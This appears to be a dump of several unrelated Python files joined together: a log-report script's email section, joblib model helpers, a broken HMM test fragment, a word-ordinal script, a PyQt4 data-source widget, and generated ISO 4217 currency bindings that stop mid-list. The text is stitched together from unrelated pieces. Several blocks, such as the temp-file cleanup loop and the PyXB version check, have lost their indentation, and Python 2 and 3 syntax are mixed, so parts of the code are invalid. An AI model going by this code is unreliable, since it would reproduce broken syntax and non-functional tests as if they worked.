        __TOP_REQUESTED_URLS_ROWS += _html_row(i, str(v))
print('\n')

# printing most referring URLs (typo fix: was 'referering')
print(bcolors.HEADER + 'Most referring URLs' + bcolors.ENDC)
for i, v in sorted(MOST_REFERING_URLS.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    print( ' ' + i + ' : ' + str(v) + ' times' )
    if SEND_EMAIL:
        __TOP_REFERER_ULS_ROWS += _html_row(i, str(v))
print('\n')

# printing Longest response time (typo fix: was 'respone').
# response_time is in microseconds; NOTE(review): the '/' divisions below
# rely on Python 2 integer (floor) division -- behavior kept as-is.
print(bcolors.HEADER + 'Longest response time' + bcolors.ENDC)
for i, v in sorted(LONGEST_URL_RESPONSE_TIME.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    if v > 0:
        log_time_string = ''
        if v / 1000000 > 60 :
            log_time_string = str(v / 60000000 ) + ' mins'
            arb = (v % 60000000) / 1000000
            if arb > 0 :
                log_time_string += ' , ' + str(arb) + ' secs'
        else:
            log_time_string = str( v / 1000000) + ' seconds '
        print( ' ' + i + ' : ' + log_time_string)
        if SEND_EMAIL:
            __LONGEST_RESPONSE_TIME_URLS_ROWS += _html_row(i, log_time_string)
print('\n')

# printing Largest response size (typo fix: was 'respone')
print(bcolors.HEADER + 'Largest response size' + bcolors.ENDC)
for k, v in sorted(LARGEST_URL_RESPONSE_SIZE.items(), key=operator.itemgetter(1), reverse=True)[:10]:
    if v > 0:
        # Convert bytes to the largest whole unit (KB upwards).
        v = v / 1024
        size_name = ("KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
        i = int(math.floor(math.log(v,1024)))
        p = math.pow(1024,i)
        s = round(v/p,2)
        response_size_str = str(s) + str(size_name[i])
        print( ' ' + k + ' : ' + response_size_str )
        if SEND_EMAIL:
            __LARGEST_RESPONSE_SIZE_URLS_ROWS += _html_row(k, response_size_str)
print('\n')
# Substitute the accumulated per-section rows into the template and
# send the report.
if SEND_EMAIL:
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__HTTP_STATUS_CODES_ROWS', __HTTP_STATUS_CODES_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__HTTP_REQUEST_TYPES_ROWS', __HTTP_REQUEST_TYPES_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_IPS_ROWS', __TOP_REQUESTING_IPS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_CLIENTS_ROWS', __TOP_REQUESTING_CLIENTS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_OSS_ROWS', __TOP_REQUESTING_OSS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTING_COUNTRIES_ROWS', __TOP_REQUESTING_COUNTRIES_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REQUESTED_URLS_ROWS', __TOP_REQUESTED_URLS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__TOP_REFERER_ULS_ROWS', __TOP_REFERER_ULS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__LONGEST_RESPONSE_TIME_URLS_ROWS', __LONGEST_RESPONSE_TIME_URLS_ROWS)
    EMAIL_HTML_TEMPLATE = EMAIL_HTML_TEMPLATE.replace('__LARGEST_RESPONSE_SIZE_URLS_ROWS', __LARGEST_RESPONSE_SIZE_URLS_ROWS)
    print('\n\n * Sending email report ..')
    # NOTE(review): the message is raw HTML with no MIME headers and a
    # hard-coded envelope sender -- consider email.mime + a real sender.
    try:
        smtpObj = smtplib.SMTP('localhost')
        smtpObj.sendmail( 'test@test.com', TO_EMAILS , EMAIL_HTML_TEMPLATE)
        # BUG FIX: converted Python-2 print statements to calls, matching
        # the rest of the file.
        print(" \t Successfully sent email ..")
    except smtplib.SMTPException:
        # BUG FIX: bare 'SMTPException' was never imported and would have
        # raised NameError instead of reporting the send failure.
        print("Error: unable to send email")
##################################################
# Section 02. Finazlization #
##################################################
#remove temp log files
for file in os.listdir(TEMP_DIR):
file_path = os.path.join(TEMP_DIR, file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
#elif os.path.isdir(file_path): shutil.rmtree(file_path)
except Exception , e:
print(e)
| Aelshafei/a2lr | a2lr.py | Python | apache-2.0 | 21,273 |
import os, errno
from sklearn.externals import joblib
from digoie.conf.storage import __ml_models_dir__
# ML_MODEL_PATH = __root_dir__ + 'classifier/mla/models/'
MODEL_EXT = '.pkl'
def save_model(model_name, clf):
    """Persist a fitted estimator to __ml_models_dir__/<model_name>/<model_name>.pkl.

    :param model_name: Name used for both the model directory and the
        pickle file inside it.
    :param clf: The fitted estimator (any joblib-picklable object).
    """
    model_dir = os.path.join(__ml_models_dir__, model_name)
    try:
        # Create the directory and tolerate EEXIST, avoiding the
        # check-then-create race of os.path.exists() + os.makedirs().
        # (This is what the previously unused `errno` import was for.)
        os.makedirs(model_dir)
    except OSError as exc:
        if exc.errno != errno.EEXIST:
            raise
    joblib.dump(clf, os.path.join(model_dir, model_name + MODEL_EXT))
def load_model(model_name):
    """Load and return the persisted estimator called *model_name*."""
    pkl_name = model_name + MODEL_EXT
    model_path = os.path.join(__ml_models_dir__, model_name, pkl_name)
    return joblib.load(model_path)
from HMMchain import HMMchain
def setUp(self):
    """Build the HMM parameters shared by the tests below."""
    # NOTE(review): this reads like a unittest.TestCase fixture, but no
    # enclosing class is defined in this file, and the `HMMchain` import
    # above is never used -- verify these functions are meant to be methods
    # of a TestCase subclass that constructs an HMMchain from these values.
    self.states = ('AG_rich', 'CT_rich')
    # Observation symbols are the integers 0-3.
    self.observations = (0, 1, 2, 3)
    self.start_probability = {'AG_rich': 0.6, 'CT_rich': 0.4}
    # P(next state | current state); each row sums to 1.
    self.transition_probability = {
        'AG_rich' : {'AG_rich': 0.8, 'CT_rich': 0.2},
        'CT_rich' : {'AG_rich': 0.4, 'CT_rich': 0.6}
    }
    # P(observed symbol | state); each row sums to 1.
    self.emission_probability = {
        'AG_rich' : {2: 0.5, 1: 0.1, 3: 0.3, 0:0.1},
        'CT_rich' : {2: 0.1, 1: 0.4, 3: 0.1, 0:0.4}
    }
    # Length of the simulated chain used by test_simulate.
    self.N = 10
def test_simulate(self):
    """Intended to compare an HMM simulation against a fixed expectation."""
    # Expected (state sequence, emitted symbols) for a 10-step simulation.
    res0, res1 = (['CT_rich',
                    'CT_rich',
                    'CT_rich',
                    'AG_rich',
                    'AG_rich',
                    'CT_rich',
                    'CT_rich',
                    'AG_rich',
                    'AG_rich',
                    'AG_rich'],
                   [3, 1, 0, 2, 2, 1, 0, 2, 0, 3])
    # NOTE(review): assertEqual is called with a single argument, so nothing
    # is actually compared -- and simulate() is never invoked anywhere in
    # this test. As written the test cannot meaningfully pass or fail;
    # presumably it should be something like
    # self.assertEqual(chain.simulate(self.N), (res0, res1)).
    self.assertEqual((res0, res1))
#!/usr/bin/env python3
"""Sum the character ordinals of a single word given on the command line."""

import os
import sys

args = sys.argv[1:]
if len(args) != 1:
    print('Usage: {} WORD'.format(os.path.basename(sys.argv[0])))
    sys.exit(1)

word = args[0]
# Total of the Unicode code points of every letter in the word.
number = sum(ord(letter) for letter in word)
print('"{}" = "{}"'.format(word, number))
"""
/***************************************************************************
Name : Composer Data Source Selector
Description : Widget for selecting a database table or view that will
be used across the composition by the STDM data labels.
Date : 14/May/2014
copyright : (C) 2014 by John Gitau
email : gkahiu@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtGui import (
QWidget,
QComboBox
)
from stdm.data import (
pg_tables,
pg_views
)
from .ui_composer_data_source import Ui_frmComposerDataSource
class ComposerDataSourceSelector(QWidget,Ui_frmComposerDataSource):
    """
    Widget for selecting a database table or view to be used as the data
    source for STDM data labels in a composition.
    """
    def __init__(self,parent = None):
        """
        :param parent: Optional parent widget.
        """
        QWidget.__init__(self,parent)
        self.setupUi(self)
        # Keep combo-box entries in alphabetical order as they are inserted.
        self.cboDataSource.setInsertPolicy(QComboBox.InsertAlphabetically)
        # Repopulate the combo box whenever the table/view radio buttons flip.
        self.rbTables.toggled.connect(self.onShowTables)
        self.rbViews.toggled.connect(self.onShowViews)
        #Force views to be loaded
        self.rbViews.toggle()
        #Connect signal
        #self.cboDataSource.currentIndexChanged[str].connect(self.onDataSourceSelected)
    def onDataSourceSelected(self,dataSource):
        """
        Slot raised upon selecting a data source from the items.
        Currently a no-op placeholder; the matching signal connection in
        __init__ is commented out.
        """
        pass
    def category(self):
        """
        Returns the category ("Table" or "View") that the data source
        belongs to, or None when neither radio button is checked.
        """
        if self.rbTables.isChecked():
            return "Table"
        elif self.rbViews.isChecked():
            return "View"
    def setCategory(self,categoryName):
        """
        Set selected radio button from a category name ("Table" or "View").
        NOTE(review): toggle() flips the button's current state rather than
        forcing it checked -- presumably fine because exactly one radio is
        always checked after __init__, but setChecked(True) would be safer;
        confirm against the autoExclusive setup in the .ui file.
        """
        if categoryName == "Table":
            self.rbTables.toggle()
        elif categoryName == "View":
            self.rbViews.toggle()
    def setSelectedSource(self,dataSourceName):
        """
        Set the data source name if it exists in the list; unknown names
        are silently ignored.
        """
        sourceIndex = self.cboDataSource.findText(dataSourceName)
        if sourceIndex != -1:
            self.cboDataSource.setCurrentIndex(sourceIndex)
    def onShowTables(self,state):
        """
        Slot raised to show STDM database tables. Repopulates the combo box
        (with a leading blank entry) when *state* is True.
        """
        if state:
            self.cboDataSource.clear()
            self.cboDataSource.addItem("")
            self.cboDataSource.addItems(pg_tables())
    def onShowViews(self,state):
        """
        Slot raised to show STDM database views. Repopulates the combo box
        (with a leading blank entry) when *state* is True.
        """
        if state:
            self.cboDataSource.clear()
            self.cboDataSource.addItem("")
            self.cboDataSource.addItems(pg_views())
# .\_iso4217a.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:f9dcf879a5f7be5b1c0f8faa708fbb3a510f2212
# Generated 2015-08-12 15:54:17.336000 by PyXB version 1.2.4 using Python 2.7.0.final.0
# Namespace http://ddex.net/xml/20100121/iso4217a [xmlns:iso4217a]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:9d0dcd70-40f9-11e5-9eef-b870f477ffbe')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://ddex.net/xml/20100121/iso4217a', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.

    @param xml_text An XML document.  This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.

    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.

    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser.  You might pass the URI from which
    the document was obtained.
    """
    # NOTE: PyXB-generated helper; regenerate from the schema rather than
    # editing by hand.
    # When the runtime is not configured for SAX parsing, fall back to the
    # DOM-based path.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    handler = saxer.getContentHandler()
    xmld = xml_text
    # The SAX parser consumes bytes, so encode text input first.
    if isinstance(xmld, _six.text_type):
        xmld = xmld.encode(pyxb._InputEncoding)
    saxer.parse(io.BytesIO(xmld))
    instance = handler.rootObject()
    return instance
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.
    The node tag must correspond to an element declaration in this module.

    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    # NOTE: PyXB-generated helper; regenerate from the schema rather than
    # editing by hand.
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://ddex.net/xml/20100121/iso4217a}CurrencyCode
class CurrencyCode (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """An ISO4217 three-letter code representing a Currency."""
    # NOTE: PyXB-generated binding -- do not edit by hand; regenerate from
    # the ISO 4217 schema instead. The enumeration members (ADP, AED, ...)
    # are attached to this class below via
    # CurrencyCode._CF_enumeration.addEnumeration(...).
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurrencyCode')
    _XSDLocation = pyxb.utils.utility.Location('http://ddex.net/xml/20100121/iso4217a.xsd', 3, 4)
    _Documentation = 'An ISO4217 three-letter code representing a Currency.'
CurrencyCode._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurrencyCode, enum_prefix=None)
CurrencyCode.ADP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ADP', tag='ADP')
CurrencyCode.AED = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AED', tag='AED')
CurrencyCode.AFA = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AFA', tag='AFA')
CurrencyCode.ALL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ALL', tag='ALL')
CurrencyCode.AMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AMD', tag='AMD')
CurrencyCode.ANG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ANG', tag='ANG')
CurrencyCode.AOA = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AOA', tag='AOA')
CurrencyCode.ARS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ARS', tag='ARS')
CurrencyCode.ATS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ATS', tag='ATS')
CurrencyCode.AUD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AUD', tag='AUD')
CurrencyCode.AWG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AWG', tag='AWG')
CurrencyCode.AZM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='AZM', tag='AZM')
CurrencyCode.BAM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BAM', tag='BAM')
CurrencyCode.BBD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BBD', tag='BBD')
CurrencyCode.BDT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BDT', tag='BDT')
CurrencyCode.BEF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BEF', tag='BEF')
CurrencyCode.BGN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BGN', tag='BGN')
CurrencyCode.BHD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BHD', tag='BHD')
CurrencyCode.BIF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BIF', tag='BIF')
CurrencyCode.BMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BMD', tag='BMD')
CurrencyCode.BND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BND', tag='BND')
CurrencyCode.BOB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BOB', tag='BOB')
CurrencyCode.BOV = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BOV', tag='BOV')
CurrencyCode.BRL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BRL', tag='BRL')
CurrencyCode.BSD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BSD', tag='BSD')
CurrencyCode.BTN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BTN', tag='BTN')
CurrencyCode.BWP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BWP', tag='BWP')
CurrencyCode.BYR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BYR', tag='BYR')
CurrencyCode.BZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='BZD', tag='BZD')
CurrencyCode.CAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CAD', tag='CAD')
CurrencyCode.CDF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CDF', tag='CDF')
CurrencyCode.CHF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CHF', tag='CHF')
CurrencyCode.CLP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CLP', tag='CLP')
CurrencyCode.CNY = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CNY', tag='CNY')
CurrencyCode.COP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='COP', tag='COP')
CurrencyCode.CRC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CRC', tag='CRC')
CurrencyCode.CUP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CUP', tag='CUP')
CurrencyCode.CVE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CVE', tag='CVE')
CurrencyCode.CYP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CYP', tag='CYP')
CurrencyCode.CZK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='CZK', tag='CZK')
CurrencyCode.DEM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DEM', tag='DEM')
CurrencyCode.DJF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DJF', tag='DJF')
CurrencyCode.DKK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DKK', tag='DKK')
CurrencyCode.DOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DOP', tag='DOP')
CurrencyCode.DZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='DZD', tag='DZD')
CurrencyCode.EEK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EEK', tag='EEK')
CurrencyCode.EGP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EGP', tag='EGP')
CurrencyCode.ERN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ERN', tag='ERN')
CurrencyCode.ESP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ESP', tag='ESP')
CurrencyCode.ETB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ETB', tag='ETB')
CurrencyCode.EUR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='EUR', tag='EUR')
CurrencyCode.FIM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FIM', tag='FIM')
CurrencyCode.FJD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FJD', tag='FJD')
CurrencyCode.FKP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FKP', tag='FKP')
CurrencyCode.FRF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='FRF', tag='FRF')
CurrencyCode.GBP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GBP', tag='GBP')
CurrencyCode.GEL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GEL', tag='GEL')
CurrencyCode.GHC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GHC', tag='GHC')
CurrencyCode.GIP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GIP', tag='GIP')
CurrencyCode.GMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GMD', tag='GMD')
CurrencyCode.GNF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GNF', tag='GNF')
CurrencyCode.GRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GRD', tag='GRD')
CurrencyCode.GTQ = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GTQ', tag='GTQ')
CurrencyCode.GWP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GWP', tag='GWP')
CurrencyCode.GYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='GYD', tag='GYD')
CurrencyCode.HKD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HKD', tag='HKD')
CurrencyCode.HNL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HNL', tag='HNL')
CurrencyCode.HRK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HRK', tag='HRK')
CurrencyCode.HTG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HTG', tag='HTG')
CurrencyCode.HUF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='HUF', tag='HUF')
CurrencyCode.IDR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IDR', tag='IDR')
CurrencyCode.IEP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IEP', tag='IEP')
CurrencyCode.ILS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ILS', tag='ILS')
CurrencyCode.INR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='INR', tag='INR')
CurrencyCode.IQD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IQD', tag='IQD')
CurrencyCode.IRR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='IRR', tag='IRR')
CurrencyCode.ISK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ISK', tag='ISK')
CurrencyCode.ITL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ITL', tag='ITL')
CurrencyCode.JMD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JMD', tag='JMD')
CurrencyCode.JOD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JOD', tag='JOD')
CurrencyCode.JPY = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='JPY', tag='JPY')
CurrencyCode.KES = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KES', tag='KES')
CurrencyCode.KGS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KGS', tag='KGS')
CurrencyCode.KHR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KHR', tag='KHR')
CurrencyCode.KMF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KMF', tag='KMF')
CurrencyCode.KPW = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KPW', tag='KPW')
CurrencyCode.KRW = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KRW', tag='KRW')
CurrencyCode.KWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KWD', tag='KWD')
CurrencyCode.KYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KYD', tag='KYD')
CurrencyCode.KZT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='KZT', tag='KZT')
CurrencyCode.LAK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LAK', tag='LAK')
CurrencyCode.LBP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LBP', tag='LBP')
CurrencyCode.LKR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LKR', tag='LKR')
CurrencyCode.LRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LRD', tag='LRD')
CurrencyCode.LSL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LSL', tag='LSL')
CurrencyCode.LTL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LTL', tag='LTL')
CurrencyCode.LUF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LUF', tag='LUF')
CurrencyCode.LVL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LVL', tag='LVL')
CurrencyCode.LYD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='LYD', tag='LYD')
CurrencyCode.MAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MAD', tag='MAD')
CurrencyCode.MDL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MDL', tag='MDL')
CurrencyCode.MGF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MGF', tag='MGF')
CurrencyCode.MKD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MKD', tag='MKD')
CurrencyCode.MMK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MMK', tag='MMK')
CurrencyCode.MNT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MNT', tag='MNT')
CurrencyCode.MOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MOP', tag='MOP')
CurrencyCode.MRO = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MRO', tag='MRO')
CurrencyCode.MTL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MTL', tag='MTL')
CurrencyCode.MUR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MUR', tag='MUR')
CurrencyCode.MVR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MVR', tag='MVR')
CurrencyCode.MWK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MWK', tag='MWK')
CurrencyCode.MXN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MXN', tag='MXN')
CurrencyCode.MYR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MYR', tag='MYR')
CurrencyCode.MZM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='MZM', tag='MZM')
CurrencyCode.NAD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NAD', tag='NAD')
CurrencyCode.NGN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NGN', tag='NGN')
CurrencyCode.NIO = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NIO', tag='NIO')
CurrencyCode.NLG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NLG', tag='NLG')
CurrencyCode.NOK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NOK', tag='NOK')
CurrencyCode.NPR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NPR', tag='NPR')
CurrencyCode.NZD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='NZD', tag='NZD')
CurrencyCode.OMR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='OMR', tag='OMR')
CurrencyCode.PAB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PAB', tag='PAB')
CurrencyCode.PEN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PEN', tag='PEN')
CurrencyCode.PGK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PGK', tag='PGK')
CurrencyCode.PHP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PHP', tag='PHP')
CurrencyCode.PKR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PKR', tag='PKR')
CurrencyCode.PLN = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PLN', tag='PLN')
CurrencyCode.PTE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PTE', tag='PTE')
CurrencyCode.PYG = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='PYG', tag='PYG')
CurrencyCode.QAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='QAR', tag='QAR')
CurrencyCode.ROL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ROL', tag='ROL')
CurrencyCode.RUB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='RUB', tag='RUB')
CurrencyCode.RWF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='RWF', tag='RWF')
CurrencyCode.SAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SAR', tag='SAR')
CurrencyCode.SBD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SBD', tag='SBD')
CurrencyCode.SCR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SCR', tag='SCR')
CurrencyCode.SDD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SDD', tag='SDD')
CurrencyCode.SEK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SEK', tag='SEK')
CurrencyCode.SGD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SGD', tag='SGD')
CurrencyCode.SHP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SHP', tag='SHP')
CurrencyCode.SIT = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SIT', tag='SIT')
CurrencyCode.SKK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SKK', tag='SKK')
CurrencyCode.SLL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SLL', tag='SLL')
CurrencyCode.SOS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SOS', tag='SOS')
CurrencyCode.SRD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SRD', tag='SRD')
CurrencyCode.STD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='STD', tag='STD')
CurrencyCode.SVC = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SVC', tag='SVC')
CurrencyCode.SYP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SYP', tag='SYP')
CurrencyCode.SZL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='SZL', tag='SZL')
CurrencyCode.THB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='THB', tag='THB')
